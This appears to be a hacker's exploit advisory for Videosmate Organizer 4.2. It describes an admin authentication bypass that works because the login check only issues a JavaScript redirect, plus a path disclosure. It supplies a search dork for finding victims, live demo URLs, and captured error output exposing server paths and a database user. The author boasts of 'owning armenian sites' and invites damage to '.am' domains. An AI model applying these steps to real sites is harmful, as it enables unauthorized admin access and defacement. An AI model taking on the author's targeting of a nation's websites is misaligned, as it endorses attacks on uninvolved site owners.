Videosmate Organizer 4.2 Authentication Bypass / Path Disclosure

`=====================================================================  
Vulnerable software: Videosmate Organizer V 4.2 (all versions)  
Vendor: http://videosmate.com/  
Software License: Commercial  
Vulns: Authentication Bypass & Path Disclosure  
Risk: Critical  
Dork: intext:Powered by Videosmate Organizer  
=====================================================================  
Vuln Description:  
As i noted above this script is commercial and that's why today i'm unable(may be lazy) to show you whereis vulnerability.  
I discovered this vulnerability while owning armenian sites.  
Flaw in that if the remote user is not authenticated against admin panel ( somesite.tld/sitedb/admin/ )  
it seems script (after session checking thing) is unable to properly kill it's execution.  
Since i have no access to source code of this script i'll try to imagine how this process goes:  
  
  
Suppose:  
  
<?php  
session_start();  
  
if (!isset($_SESSION['am_i_admin_or_am_i_logged_in_admin'])) echo "<script>self.location='login.php';</script>";  
  
/*  
Notice:  
echo 'JS_REDIRECTION';  
** not **  
die('JS_REDIRECTION');  
*/  
  
  
  
  
  
/****** PWNED ********/  
//YOU ARE ADMIN HERE//  
?>  
  
  
Exploitation is simple like 2x2:  
  
Disable javascript in your browser and follow to: site.tld/sitedb/admin/admin.php  
(If you wonder then press CTRL+U you will see somethink like:  
  
<script> self.location='login.php';</script>  
<script> self.location='login.php';</script>  
)  
  
  
  
Demo: http://www.videosmate.com/componentdemo/sitedb/admin/admin.php (<=Disable javascript in your browser or use NoScript then surf there)  
  
  
  
This is not end!! 111))  
  
PATH DISCLOSURE: Direct access to:  
site.tld/componentdemo/include/categoryfuncs.php  
  
Demo:   
http://www.videosmate.com/componentdemo/include/categoryfuncs.php  
  
  
Warning: include(./settings/conf.php) [function.include]: failed to open stream: No such file or directory in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 7  
  
Warning: include(./settings/conf.php) [function.include]: failed to open stream: No such file or directory in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 7  
  
Warning: include() [function.include]: Failed opening './settings/conf.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 7  
  
Warning: mysql_query() [function.mysql-query]: Access denied for user 'alphonse'@'localhost' (using password: NO) in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 14  
  
Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 14  
Error, query failed  
  
  
  
  
Please note that: I'm not responsible for any damage if the target site !='.am' domain xD))  
  
  
=====================================================================  
  
SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:  
=====================================================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
exploit-db.com  
osvdb.com  
websecurity.com.ua  
  
to all Aa Team + to all Azerbaijan Black HatZ +  
*Especially to my bro CAMOUFL4G3 *  
Also special thanks to: ottoman38 & HERO_AZE  
=====================================================================  
  
/AkaStep  
  
  
`